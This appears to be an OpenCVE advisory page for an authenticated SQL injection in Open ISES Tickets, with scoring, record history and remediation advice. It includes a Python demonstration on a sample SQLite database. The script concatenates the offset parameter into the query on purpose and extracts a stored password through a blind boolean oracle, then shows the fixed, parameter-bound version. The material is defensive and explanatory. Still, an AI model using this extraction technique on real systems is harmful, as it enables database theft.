Description
Open ISES Tickets before 3.44.2 contains a SQL injection vulnerability in ajax/sit_incidents.php where the offset GET parameter is concatenated into the LIMIT clause of a SELECT statement without sanitization. Authenticated attackers can craft requests that alter query semantics to read, modify, or destroy database contents.
Published: 2026-05-21
Score: 7.1 High
EPSS: n/a
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

Open ISES Tickets versions prior to 3.44.2 contain a SQL injection flaw (CWE-89) in the ajax/sit_incidents.php script: the GET parameter "offset" is concatenated directly into the LIMIT clause of a SELECT statement without sanitization, so a request value that is not a plain integer changes the structure of the query rather than just its page position. Exploitation allows an authenticated attacker to alter the semantics of the database query and, per the description, read, modify, or destroy database contents. The CVSS vectors recorded for this entry (C:H/I:L/A:N) rate the confidentiality impact as high, the integrity impact as low, and the availability impact as none, so data disclosure is the primary concern.

Affected Systems

The affected product is Open ISES Tickets. All installations running a version earlier than 3.44.2 are vulnerable. No specific minor version details are enumerated beyond the stated cutoff.

Risk and Exploitability

The CVSS score of 7.1 (v3.1 vector AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N) indicates high severity: the endpoint is reachable over the network, the attack is low complexity, no user interaction is needed, and only low privileges (an ordinary authenticated account) are required. EPSS data is not available, so the current probability of exploitation is unknown; the vulnerability is not listed in the CISA KEV catalog, and the SSVC assessment attached to this record reports Exploitation: none and Automatable: no. The authentication requirement limits the attack surface to users who already hold an account, but any such user could execute attacker-controlled SQL via crafted requests to the vulnerable endpoint.

Generated by OpenCVE AI on May 21, 2026 at 18:50 UTC.

Remediation

No vendor advisory, reference link, or workaround is attached to this record. The description itself identifies 3.44.2 as the first version that does not contain the flaw, so upgrading to that version is the expected fix.

OpenCVE Recommended Actions

  • Upgrade Open ISES Tickets to version 3.44.2 or later, the first version the description reports as unaffected.
  • Until the upgrade is in place, restrict ajax/sit_incidents.php to the accounts that genuinely need it; because the flaw is reachable by any authenticated user (PR:L), reducing who can authenticate to the application reduces exposure. If you maintain a local patch, have the script cast offset to a non-negative integer (or bind it as a query parameter) before it reaches the SQL statement; that removes the injection point rather than filtering around it.
  • A web-application firewall or edge rule that rejects any offset value that is not a string of digits is a reasonable stopgap for this specific parameter, but it does not fix the underlying concatenation and should not be treated as the remediation.
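The following Python script is an added illustration written for this page; it is not code from Open ISES Tickets, and ajax/sit_incidents.php itself is not reproduced here. It recreates the pattern that the Impact section and the recommended actions refer to: a pagination query whose OFFSET comes from a request parameter by string concatenation, an attacker using that position as a boolean oracle to read a value out of a different table, and the fix of validating the parameter as a non-negative integer and binding it. The table names, column names, page size and sample rows are constructed assumptions. The backend is SQLite, whose LIMIT and OFFSET accept any expression including a subquery; MySQL accepts only integer literals there, so the concrete payload against a MySQL deployment would differ while the flaw class and the fix do not.

```python
import re
import sqlite3

# Constructed sample data (assumption, not the project's schema): a paginated
# incidents table and a users table holding a secret the endpoint should never expose.
SAMPLE_SECRET = "5f4dcc3b"
PAGE_SIZE = 20
HEX_ALPHABET = "0123456789abcdef"


def make_db() -> sqlite3.Connection:
    """Build an in-memory SQLite database with 50 incidents and one user row."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE incidents (id INTEGER PRIMARY KEY, title TEXT NOT NULL);
        CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT NOT NULL, password TEXT NOT NULL);
        """
    )
    conn.executemany(
        "INSERT INTO incidents (title) VALUES (?)",
        [(f"Incident {i}",) for i in range(1, 51)],
    )
    conn.execute(
        "INSERT INTO users (id, name, password) VALUES (1, 'admin', ?)", (SAMPLE_SECRET,)
    )
    conn.commit()
    return conn


def fetch_incidents_vulnerable(conn: sqlite3.Connection, offset: str) -> list:
    """Flaw class from the advisory: the request value lands in the SQL text as-is."""
    sql = f"SELECT id, title FROM incidents ORDER BY id LIMIT {PAGE_SIZE} OFFSET {offset}"
    return conn.execute(sql).fetchall()


def fetch_incidents_fixed(conn: sqlite3.Connection, offset: str) -> list:
    """Hardened form: accept only ASCII digits, then bind the integer as a parameter."""
    if re.fullmatch(r"[0-9]{1,9}", offset) is None:
        raise ValueError("offset must be a non-negative integer")
    sql = "SELECT id, title FROM incidents ORDER BY id LIMIT ? OFFSET ?"
    return conn.execute(sql, (PAGE_SIZE, int(offset))).fetchall()


def oracle_payload(position: int, guess: str) -> str:
    """Boolean oracle: skip 0 rows when the guessed character is right, 1000 otherwise.

    With 50 rows in the table, OFFSET 1000 yields an empty page, so the presence or
    absence of rows in the response leaks one bit about the secret per request.
    """
    if guess not in HEX_ALPHABET:
        raise ValueError("guess must be a single hex digit")  # keeps quotes out of the payload
    return (
        f"(SELECT CASE WHEN substr(password, {position}, 1) = '{guess}' "
        f"THEN 0 ELSE 1000 END FROM users WHERE id = 1)"
    )


def extract_secret(conn: sqlite3.Connection, length: int) -> str:
    """Recover a hex secret one character at a time through the vulnerable query."""
    recovered = ""
    for pos in range(1, length + 1):
        for ch in HEX_ALPHABET:
            if fetch_incidents_vulnerable(conn, oracle_payload(pos, ch)):
                recovered += ch
                break
        else:
            raise RuntimeError(f"no hex digit matched at position {pos}")
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("legitimate page:", len(fetch_incidents_vulnerable(db, "0")), "rows")
    print("leaked via OFFSET oracle:", extract_secret(db, len(SAMPLE_SECRET)))
    try:
        fetch_incidents_fixed(db, oracle_payload(1, "5"))
    except ValueError as exc:
        print("fixed endpoint rejected payload:", exc)
```

The oracle needs no error messages and no data from the incidents table itself; it only observes whether a page comes back empty, which is why a WAF rule that merely looks for quotes or UNION would not stop it. The fixed variant refuses anything that is not a short digit string before the value gets near the SQL text, and binds it as a parameter so that the query structure is fixed at authoring time.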

Generated by OpenCVE AI on May 21, 2026 at 18:50 UTC.

Advisories

No advisories yet.

History

Thu, 21 May 2026 18:30:00 +0000

Values removed: none
Values added:
  Metrics (ssvc): {'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}


Thu, 21 May 2026 17:45:00 +0000

Values removed: none
Values added:
  Description: Open ISES Tickets before 3.44.2 contains a SQL injection vulnerability in ajax/sit_incidents.php where the offset GET parameter is concatenated into the LIMIT clause of a SELECT statement without sanitization. Authenticated attackers can craft requests that alter query semantics to read, modify, or destroy database contents.
  Title: Open ISES Tickets < 3.44.2 SQL Injection via ajax/sit_incidents.php offset Parameter
  Weaknesses: CWE-89
  References: (empty)
  Metrics (cvssV3_1): {'score': 7.1, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N'}
  Metrics (cvssV4_0): {'score': 7.1, 'vector': 'CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N'}


MITRE

Status: PUBLISHED

Assigner: VulnCheck

Published:

Updated: 2026-05-21T17:48:04.357Z

Reserved: 2026-05-21T13:15:18.101Z

Link: CVE-2026-48233

Vulnrichment

Updated: 2026-05-21T17:48:00.434Z

NVD

Status: Deferred

Published: 2026-05-21T18:16:20.050

Modified: 2026-05-21T19:10:12.323

Link: CVE-2026-48233

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-05-21T19:00:14Z

Weaknesses